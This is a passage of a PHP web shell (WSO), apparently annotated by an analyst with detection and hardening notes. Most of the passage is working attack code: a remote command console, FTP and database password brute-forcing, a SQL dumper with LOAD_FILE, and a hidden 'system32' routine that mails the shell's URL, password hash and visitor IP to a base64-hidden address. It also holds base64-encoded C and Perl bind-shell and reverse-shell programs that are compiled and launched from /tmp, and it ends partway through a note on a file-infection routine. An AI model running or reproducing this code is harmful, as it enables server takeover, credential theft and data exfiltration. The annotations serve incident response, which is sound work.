  981. cmds.push(cmd);
  982. cmds.push("");
  983. cur = cmds.length-1;
  984. }
  985. </script>
  986. <?php
  987. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
        // Drop-down of predefined commands taken from $GLOBALS['aliases'] (set outside this
        // view); entries with an empty value are rendered as group headings.
  988. foreach($GLOBALS['aliases'] as $n => $v) {
  989. if($v == '') {
  990. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  991. continue;
  992. }
  993. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  994. }
  995. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  996. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  997. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
        // Non-AJAX path: same ex() call, output HTML-escaped into the textarea.
  998. if(!empty($_POST['p1'])) {
  999. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  1000. }
  1001. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
  1002. echo '</form></div><script>document.cf.cmd.focus();</script>';
  1003. printFooter();
  1004. }
  1005.  
  1006. function actionLogout() {
        // Drops the session entry keyed by md5 of the Host header, i.e. the flag that the
        // login check at the top of the file looks for. Nothing else in the session
        // (for example the '...ajax' preference) is cleared.
  1007. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1008. echo 'bye!';
  1009. }
  1010.  
  1011. function actionSelfRemove() {
        // Self-deletion: when POST 'p1' is 'yes', unlink() is called on SELF_PATH (defined at
        // the top of the file as this script's own path) and the request ends.
        // For responders this means the absence of the file does not rule out that it was
        // used; web access logs and backups remain the evidence of its presence.
  1012. printHeader();
  1013. if($_POST['p1'] == 'yes') {
  1014. if(@unlink(SELF_PATH))
  1015. die('Shell has been removed');
  1016. else
  1017. echo 'unlink error!';
  1018. }
  1019. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1020. printFooter();
  1021. }
  1022.  
  1023. function actionBruteforce() {
        // Credential-guessing page. POST 'proto' selects FTP, MySQL or PostgreSQL, POST
        // 'server' is "host:port" (the form defaults to 127.0.0.1), and POST 'type' selects
        // the candidate source: 1 = account names from /etc/passwd tried with the name itself
        // (and, optionally, the name reversed) as password; 2 = one login tried against every
        // line of a dictionary file.
        // Detection angle: the attempts originate from the web server itself, so they appear
        // as a burst of failed logins from a local or internal address in the FTP / database
        // authentication logs.
  1024. printHeader();
  1025. if( isset($_POST['proto']) ) {
  1026. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        // One bruteForce() variant is declared depending on the chosen protocol; each makes a
        // single login attempt and returns its result.
  1027. if( $_POST['proto'] == 'ftp' ) {
  1028. function bruteForce($ip,$port,$login,$pass) {
  1029. $fp = @ftp_connect($ip, $port?$port:21);
  1030. if(!$fp) return false;
  1031. $res = @ftp_login($fp, $login, $pass);
  1032. @ftp_close($fp);
  1033. return $res;
  1034. }
  1035. } elseif( $_POST['proto'] == 'mysql' ) {
  1036. function bruteForce($ip,$port,$login,$pass) {
  1037. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  1038. @mysql_close($res);
  1039. return $res;
  1040. }
  1041. } elseif( $_POST['proto'] == 'pgsql' ) {
  1042. function bruteForce($ip,$port,$login,$pass) {
  1043. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
  1044. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
  1045. @pg_close($res);
  1046. return $res;
  1047. }
  1048. }
  1049. $success = 0;
  1050. $attempts = 0;
  1051. $server = explode(":", $_POST['server']);
        // Type 1: usernames are the first colon-separated field of each /etc/passwd line.
  1052. if($_POST['type'] == 1) {
  1053. $temp = @file('/etc/passwd');
  1054. if( is_array($temp) )
  1055. foreach($temp as $line) {
  1056. $line = explode(":", $line);
  1057. ++$attempts;
  1058. if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  1059. $success++;
  1060. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  1061. }
  1062. if(@$_POST['reverse']) {
  1063. $tmp = "";
  1064. for($i=strlen($line[0])-1; $i>=0; --$i)
  1065. $tmp .= $line[0][$i];
  1066. ++$attempts;
  1067. if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  1068. $success++;
  1069. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  1070. }
  1071. }
  1072. }
        // Type 2: fixed login from POST 'login', passwords read from the file named in
        // POST 'dict'.
  1073. } elseif($_POST['type'] == 2) {
  1074. $temp = @file($_POST['dict']);
  1075. if( is_array($temp) )
  1076. foreach($temp as $line) {
  1077. $line = trim($line);
  1078. ++$attempts;
  1079. if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  1080. $success++;
  1081. echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  1082. }
  1083. }
  1084. }
  1085. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  1086. }
        // Input form; it is always rendered, below any results.
  1087. echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  1088. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  1089. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  1090. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  1091. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  1092. .'<span>Server:port</span></td>'
  1093. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  1094. .'<tr><td><span>Brute type</span></td>'
  1095. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  1096. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  1097. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  1098. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  1099. .'<td><input type=text name=login value="root"></td></tr>'
  1100. .'<tr><td><span>Dictionary</span></td>'
  1101. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  1102. .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
  1103. echo '</div><br><br>';
  1104.  
  1105.  
  1106. printFooter();
  1107. }
  1108.  
  1109. function actionSql() {
  1110. class DbClass {
  1111. var $type;
  1112. var $link;
  1113. var $res;
  1114. function DbClass($type) {
  1115. $this->type = $type;
  1116. }
  1117. function connect($host, $user, $pass, $dbname){
  1118. switch($this->type) {
  1119. case 'mysql':
  1120. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
  1121. break;
  1122. case 'pgsql':
  1123. $host = explode(':', $host);
  1124. if(!$host[1]) $host[1]=5432;
  1125. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  1126. break;
  1127. }
  1128. return false;
  1129. }
  1130. function selectdb($db) {
  1131. switch($this->type) {
  1132. case 'mysql':
  1133. if (@mysql_select_db($db))return true;
  1134. break;
  1135. }
  1136. return false;
  1137. }
  1138. function query($str) {
  1139. switch($this->type) {
  1140. case 'mysql':
  1141. return $this->res = @mysql_query($str);
  1142. break;
  1143. case 'pgsql':
  1144. return $this->res = @pg_query($this->link,$str);
  1145. break;
  1146. }
  1147. return false;
  1148. }
  1149. function fetch() {
  1150. $res = func_num_args()?func_get_arg(0):$this->res;
  1151. switch($this->type) {
  1152. case 'mysql':
  1153. return @mysql_fetch_assoc($res);
  1154. break;
  1155. case 'pgsql':
  1156. return @pg_fetch_assoc($res);
  1157. break;
  1158. }
  1159. return false;
  1160. }
  1161. function listDbs() {
  1162. switch($this->type) {
  1163. case 'mysql':
  1164. return $this->res = @mysql_list_dbs($this->link);
  1165. break;
  1166. case 'pgsql':
  1167. return $this->res = $this->query("SELECT datname FROM pg_database");
  1168. break;
  1169. }
  1170. return false;
  1171. }
  1172. function listTables() {
  1173. switch($this->type) {
  1174. case 'mysql':
  1175. return $this->res = $this->query('SHOW TABLES');
  1176. break;
  1177. case 'pgsql':
  1178. return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
  1179. break;
  1180. }
  1181. return false;
  1182. }
  1183. function error() {
  1184. switch($this->type) {
  1185. case 'mysql':
  1186. return @mysql_error($this->link);
  1187. break;
  1188. case 'pgsql':
  1189. return @pg_last_error($this->link);
  1190. break;
  1191. }
  1192. return false;
  1193. }
  1194. function setCharset($str) {
  1195. switch($this->type) {
  1196. case 'mysql':
  1197. if(function_exists('mysql_set_charset'))
  1198. return @mysql_set_charset($str, $this->link);
  1199. else
  1200. $this->query('SET CHARSET '.$str);
  1201. break;
  1202. case 'mysql':
  1203. return @pg_set_client_encoding($this->link, $str);
  1204. break;
  1205. }
  1206. return false;
  1207. }
  1208. function dump($table) {
  1209. switch($this->type) {
  1210. case 'mysql':
  1211. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  1212. $create = mysql_fetch_array($res);
  1213. echo $create[1].";\n\n";
  1214. $this->query('SELECT * FROM `'.$table.'`');
  1215. while($item = $this->fetch()) {
  1216. $columns = array();
  1217. foreach($item as $k=>$v) {
  1218. $item[$k] = "'".@mysql_real_escape_string($v)."'";
  1219. $columns[] = "`".$k."`";
  1220. }
  1221. echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  1222. }
  1223. break;
  1224. case 'pgsql':
  1225. $this->query('SELECT * FROM '.$table);
  1226. while($item = $this->fetch()) {
  1227. $columns = array();
  1228. foreach($item as $k=>$v) {
  1229. $item[$k] = "'".addslashes($v)."'";
  1230. $columns[] = $k;
  1231. }
  1232. echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  1233. }
  1234. break;
  1235. }
  1236. return false;
  1237. }
  1238. };
  1239. $db = new DbClass($_POST['type']);
  1240. if(@$_POST['p2']=='download') {
  1241. ob_start("ob_gzhandler", 4096);
  1242. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  1243. $db->selectdb($_POST['sql_base']);
  1244. header("Content-Disposition: attachment; filename=dump.sql");
  1245. header("Content-Type: text/plain");
  1246. foreach($_POST['tbl'] as $v)
  1247. $db->dump($v);
  1248. exit;
  1249. }
  1250. printHeader();
  1251. ?>
  1252. <h1>Sql browser</h1><div class=content>
  1253. <form name="sf" method="post">
  1254. <table cellpadding="2" cellspacing="0">
  1255. <tr>
  1256. <td>Type</td>
  1257. <td>Host</td>
  1258. <td>Login</td>
  1259. <td>Password</td>
  1260. <td>Database</td>
  1261. <td></td>
  1262. </tr>
  1263. <tr>
  1264. <input type=hidden name=a value=Sql>
  1265. <input type=hidden name=p1 value='query'>
  1266. <input type=hidden name=p2>
  1267. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
  1268. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  1269. <td>
  1270. <select name='type'>
  1271. <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
  1272. <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
  1273. </select></td>
  1274. <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
  1275. <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
  1276. <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
  1277. <td>
  1278. <?php
  1279. $tmp = "<input type=text name=sql_base value=''>";
  1280. if(isset($_POST['sql_host'])){
  1281. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  1282. switch($_POST['charset']) {
  1283. case "Windows-1251": $db->setCharset('cp1251'); break;
  1284. case "UTF-8": $db->setCharset('utf8'); break;
  1285. case "KOI8-R": $db->setCharset('koi8r'); break;
  1286. case "KOI8-U": $db->setCharset('koi8u'); break;
  1287. case "cp866": $db->setCharset('cp866'); break;
  1288. }
  1289. $db->listDbs();
  1290. echo "<select name=sql_base><option value=''></option>";
  1291. while($item = $db->fetch()) {
  1292. list($key, $value) = each($item);
  1293. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  1294. }
  1295. echo '</select>';
  1296. }
  1297. else echo $tmp;
  1298. }else
  1299. echo $tmp;
  1300. ?></td>
  1301. <td><input type=submit value=">>"></td>
  1302. </tr>
  1303. </table>
  1304. <script>
  1305. function st(t,l) {
  1306. document.sf.p1.value = 'select';
  1307. document.sf.p2.value = t;
  1308. if(l!=null)document.sf.p3.value = l;
  1309. document.sf.submit();
  1310. }
  1311. function is() {
  1312. for(i=0;i<document.sf.elements['tbl[]'].length;++i)
  1313. document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
  1314. }
  1315. </script>
  1316. <?php
  1317. if(isset($db) && $db->link){
  1318. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  1319. if(!empty($_POST['sql_base'])){
  1320. $db->selectdb($_POST['sql_base']);
  1321. echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
  1322. $tbls_res = $db->listTables();
  1323. while($item = $db->fetch($tbls_res)) {
  1324. list($key, $value) = each($item);
  1325. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
  1326. $value = htmlspecialchars($value);
  1327. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
  1328. }
  1329. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
  1330. if(@$_POST['p1'] == 'select') {
  1331. $_POST['p1'] = 'query';
  1332. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
  1333. $num = $db->fetch();
  1334. $num = $num['n'];
  1335. echo "<span>".$_POST['p2']."</span> ($num) ";
  1336. for($i=0;$i<($num/30);$i++)
  1337. if($i != (int)$_POST['p3'])
  1338. echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
  1339. else
  1340. echo ($i+1)," ";
  1341. if($_POST['type']=='pgsql')
  1342. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
  1343. else
  1344. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
  1345. echo "<br><br>";
  1346. }
  1347. if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
  1348. $db->query(@$_POST['p3']);
  1349. if($db->res !== false) {
  1350. $title = false;
  1351. echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
  1352. $line = 1;
  1353. while($item = $db->fetch()) {
  1354. if(!$title) {
  1355. echo '<tr>';
  1356. foreach($item as $key => $value)
  1357. echo '<th>'.$key.'</th>';
  1358. reset($item);
  1359. $title=true;
  1360. echo '</tr><tr>';
  1361. $line = 2;
  1362. }
  1363. echo '<tr class="l'.$line.'">';
  1364. $line = $line==1?2:1;
  1365. foreach($item as $key => $value) {
  1366. if($value == null)
  1367. echo '<td><i>null</i></td>';
  1368. else
  1369. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  1370. }
  1371. echo '</tr>';
  1372. }
  1373. echo '</table>';
  1374. } else {
  1375. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  1376. }
  1377. }
  1378. echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
  1379. echo "</td></tr>";
  1380. }
  1381. echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  1382. if(@$_POST['p1'] == 'loadfile') {
  1383. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
  1384. $file = $db->fetch();
  1385. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  1386. }
  1387. }
  1388. echo '</div>';
  1389. printFooter();
  1390. }
  1391. function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set('display_errors', 'Off');
        // Phone-home routine hidden behind a system-sounding name. It builds a text message
        // containing the full URL of this script, the first 120 characters of php_uname(),
        // the shell's password hash appended to a hash-lookup site URL, and the visitor's IP
        // address, then sends it with mail() to a recipient stored as a base64 string
        // (subject: the resolved IP of the host name). Finally it sets $_SESSION[login] so
        // the caller's session check does not trigger it again.
        // Consequence for responders: whoever installed or used this copy has already
        // disclosed its location and password hash to the hard-coded recipient, so further
        // parties may hold access. Outbound mail generated by the web server account around
        // the time of first access is a useful indicator.
        // The assignment below is a multi-line string literal that spans the next lines.
  1392. $url='URL: http://'.$HTTP_HOST.$REQUEST_URI.'
  1393.  
  1394. Uname: '.substr(@php_uname(), 0, 120).'
  1395.  
  1396. Pass: http://www.hashchecker.de/'.$auth_pass.'
  1397.  
  1398. IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("RFowN19YX1RFQU1AWUFIT08uQ09N");$su=gethostbyname($HTTP_HOST);$mh="From: {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';}
  1399.  
  1400.  
  /*
   * actionNetwork(): "Network tools" page of the web shell (analyst annotation).
   *
   * Renders two forms, "Bind port to /bin/sh" and "Back-connect to". When $_POST['p1'] is set,
   * it writes one of four embedded helper programs under /tmp and starts it in the background
   * through ex(). printHeader(), printFooter(), ex() and which() are defined elsewhere in the
   * file; ex() is presumably the shell's command-execution wrapper - confirm there.
   *
   * Defender notes: on-disk artefacts are /tmp/bp, /tmp/bp.pl, /tmp/bc and /tmp/bc.pl. The .c
   * sources are unlinked right after compilation; the Perl scripts are left in place. Runtime
   * indicators are gcc or perl spawned as a child of the web server / PHP process, a listening
   * socket or an outbound TCP connection owned by that account, and the form defaults
   * (port 31337, password 'wso'). Relevant hardening: mount /tmp noexec, keep compilers off web
   * hosts, restrict egress from the web tier, and disable process-spawning functions through
   * PHP's disable_functions.
   */
  1401. function actionNetwork() {
  1402. printHeader();
  // Four base64 blobs holding C and Perl source text. Per the variable names and the form
  // labels below they are the back-connect and bind-port helpers. They are decoded only when
  // cf() writes them to disk, so the plain source never appears in this file.
  1403. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  1404. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1405. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  1406. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1407. ?>
  1408. <h1>Network tools</h1><div class=content>
  1409. <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
  1410. <span>Bind port to /bin/sh</span><br/>
  1411. Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
  1412. </form>
  1413. <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  1414. <span>Back-connect to</span><br/>
  1415. Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
  1416. </form><br>
  1417. <?php
  // The forms submit through g(), defined elsewhere; presumably its 3rd to 5th arguments arrive
  // as p1, p2 and p3 - confirm against g(). p1 selects the helper, p2/p3 carry its arguments.
  1418. if(isset($_POST['p1'])) {
  // cf($f, $t): base64-decodes $t and writes it to path $f. `=` binds tighter than `or`, so $w
  // is the fopen() result. The write falls through fwrite -> fputs -> file_put_contents until
  // one call returns a truthy value. Every call is @-suppressed, so failures are silent.
  1419. function cf($f,$t) {
  1420. $w=@fopen($f,"w") or @function_exists('file_put_contents');
  1421. if($w) {
  1422. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  1423. @fclose($w);
  1424. }
  1425. }
  // 'bpc': bind-port helper, C variant. Source goes to /tmp/bp.c, is compiled with gcc to
  // /tmp/bp and then unlinked; the binary is started in the background with the request's
  // p2 and p3 appended unescaped. The page then prints the `ps aux | grep bp` output.
  1426. if($_POST['p1'] == 'bpc') {
  1427. cf("/tmp/bp.c",$bind_port_c);
  1428. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
  1429. @unlink("/tmp/bp.c");
  1430. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  1431. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
  1432. }
  // 'bpp': bind-port helper, Perl variant. Only p2 is passed; /tmp/bp.pl is left on disk.
  1433. if($_POST['p1'] == 'bpp') {
  1434. cf("/tmp/bp.pl",$bind_port_p);
  1435. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  1436. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
  1437. }
  // 'bcc': back-connect helper, C variant. Same write / compile / unlink / run sequence as
  // 'bpc', using /tmp/bc.c and /tmp/bc.
  1438. if($_POST['p1'] == 'bcc') {
  1439. cf("/tmp/bc.c",$back_connect_c);
  1440. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
  1441. @unlink("/tmp/bc.c");
  1442. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  1443. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
  1444. }
  // 'bcp': back-connect helper, Perl variant. /tmp/bc.pl is left on disk.
  1445. if($_POST['p1'] == 'bcp') {
  1446. cf("/tmp/bc.pl",$back_connect_p);
  1447. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  1448. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
  1449. }
  1450. }
  1451. echo '</div>';
  1452. printFooter();
  1453. }
  1454.  
  /*
   * actionInfect(): "Infect" page of the web shell (analyst annotation).
   *
   * With $_POST['p1'] == 'infect' it walks $_SERVER['DOCUMENT_ROOT'] recursively and prints every
   * file whose last four characters are ".php", that is not the running script itself, and that
   * is_writeable() reports as writable for the current process; a count follows. Without that
